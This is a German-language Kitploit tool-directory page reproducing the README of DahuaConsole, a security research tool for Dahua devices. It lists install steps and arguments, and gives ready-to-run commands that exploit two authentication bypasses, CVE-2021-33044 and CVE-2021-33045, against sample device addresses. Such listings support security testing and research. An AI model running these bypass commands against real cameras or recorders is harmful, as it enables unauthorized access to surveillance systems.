Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
DahuaConsole — Dahua Console, Zugriff auf die interne Debug-Konsole und/oder andere recherchierte Funktionen in Dahua-Geräten. Du kannst gerne zu diesem Projekt beitragen. | Kitploit
Tools/GitHubGitHub/mcw0/dahuaconsole
Authentifizierung & AutorisierungEmbedded-System-SicherheitAufklärungIoT-SicherheitSchwachstellenanalyseExploitationInformationsbeschaffungPenetrationstests
GitHubmcw0/dahuaconsole

DahuaConsole

Dahua Console, Zugriff auf die interne Debug-Konsole und/oder andere recherchierte Funktionen in Dahua-Geräten. Du kannst gerne zu diesem Projekt beitragen.

3167926vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Dahua Console

  • Version: Pre-alpha
  • Bugs: Allerdings
  • TODO: Jede Menge Zeug

[Installationsanforderungen]

root@kitploit:~
sudo pip3 install -r requirements.txt

[Argumente]

root@kitploit:~
  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://<username>:<password>@<host>:<port>
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[Veröffentlichung]

[Aktualisierung] 2022-07-10

  • 3des_old-Anmeldemethode für VTH1510CH mit V2-Software von 2016 hinzugefügt
    • Geringfügiger Unterschied in den Paketdaten des Logins
    • Geräteparameter bei Verbindung nicht abfragen - sonst wird die Verbindung zurückgesetzt
  • --restore config-file.json hinzugefügt
    • Lädt eine JSON-Konfigurationsdatei oder Teile davon.

Beispiel:

./Console.py --rhost 192.168.1.x --proto 3des --auth admin:admin --logon old_3des --dump config

[Aktualisierung]

2021-10-07

Details hier: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

Erforderliches Protokoll: DHIP oder HTTP/HTTPS (DHIP funktioniert nicht mit TLS/SSL @TCP/443)

root@kitploit:~
[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

Erforderliches Protokoll: DHIP (DHIP funktioniert nicht mit TLS/SSL @TCP/443)

root@kitploit:~
[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

Tool herunterladen